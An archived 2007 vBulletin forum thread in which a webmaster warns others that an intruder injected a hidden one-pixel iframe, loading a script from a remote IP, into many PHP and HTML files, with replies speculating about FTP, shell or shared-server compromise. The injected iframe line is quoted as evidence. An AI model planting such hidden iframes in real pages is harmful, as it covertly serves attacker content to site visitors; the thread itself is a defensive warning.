Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 Programming Discussions
Reload this Page Webmasters Beware!
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools Display Modes
  #1  
Old 09-25-2007, 05:49 AM
JD45 JD45 is offline
 
Join Date: Feb 2006
Posts: 138
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default Webmasters Beware!
Recently we noticed a full screen LG ad on our website. We only run Tribal Fusion and IntelliTxt and neither of those should be displaying a full screen ad.

We looked in to it and this code was added to MANY of our php and html files:

Code:
<.iframe src='http://81.95.149.77/traff.php' width='1' height='1' style='visibility:hidden'><./iframe>
The IP that illegal accessed our FTP is: 81.95.149.75

That IP comes back registered to Panama. I've already sent the abuse email a letter with proof. It appears we were somehow exploited and a mass script ran adding the code at the bottom of the files affected.

Just FYI for all.
Reply With Quote
  #2  
Old 09-25-2007, 08:19 AM
manilodisan manilodisan is offline
 
Join Date: Dec 2006
Posts: 9
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
How did it accessed your files? Can you share the story?
Reply With Quote
  #3  
Old 09-25-2007, 02:36 PM
SEOvB's Avatar
SEOvB SEOvB is offline
 
Join Date: May 2007
Location: Indianapolis
Posts: 2,451
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Obvisously his server was comprimised due to a exploit in some software being ran.
Reply With Quote
  #4  
Old 09-25-2007, 02:56 PM
JD45 JD45 is offline
 
Join Date: Feb 2006
Posts: 138
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Quote:
Originally Posted by FRDS View Post
Obvisously his server was comprimised due to a exploit in some software being ran.
exactly
Reply With Quote
  #5  
Old 09-25-2007, 03:44 PM
SEOvB's Avatar
SEOvB SEOvB is offline
 
Join Date: May 2007
Location: Indianapolis
Posts: 2,451
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Just wondering what all software besides vBulletin are you currently running?
Reply With Quote
  #6  
Old 09-25-2007, 05:05 PM
JD45 JD45 is offline
 
Join Date: Feb 2006
Posts: 138
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Quote:
Originally Posted by FRDS View Post
Just wondering what all software besides vBulletin are you currently running?
No other 'official' software or scripts. Our entire site besides vb is custom coded in php. Actually I take that back, we do run vbseo as well.


It doesn't seem as if it was directed to the forums, but more so PHP overall.
Reply With Quote
  #7  
Old 09-25-2007, 05:15 PM
Marco van Herwaarden Marco van Herwaarden is offline
 
Join Date: Jul 2004
Posts: 25,415
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Most likely they had FTP or Shell access to your server, or you are on a badly secured shared server and the files where changed from another account on the same server.
Reply With Quote
  #8  
Old 09-25-2007, 05:51 PM
JD45 JD45 is offline
 
Join Date: Feb 2006
Posts: 138
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Quote:
Originally Posted by Marco van Herwaarden View Post
Most likely they had FTP or Shell access to your server, or you are on a badly secured shared server and the files where changed from another account on the same server.
We're on a dedi server, but having ftp/shell access is a possibility.

I have to say it was pretty unique. First time I've seen anyone access a site and modify php files for a monetary gain.
Reply With Quote
  #9  
Old 09-25-2007, 06:17 PM
Marco van Herwaarden Marco van Herwaarden is offline
 
Join Date: Jul 2004
Posts: 25,415
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
That happens all the time.

"Hackers" are not anymore what they used to be (just hacking for the thrill/kick). Hacks and exploits are being sold these days for commercial purposes.
Reply With Quote
Reply

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT. The time now is 09:38 PM.

Contact Us - Archive - Top

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.04131 seconds
  • Memory Usage 2,236KB
  • Queries Executed 11 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)bbcode_code
  • (3)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (9)post_thanks_box
  • (9)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (9)post_thanks_postbit_info
  • (9)postbit
  • (9)postbit_onlinestatus
  • (9)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 
Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete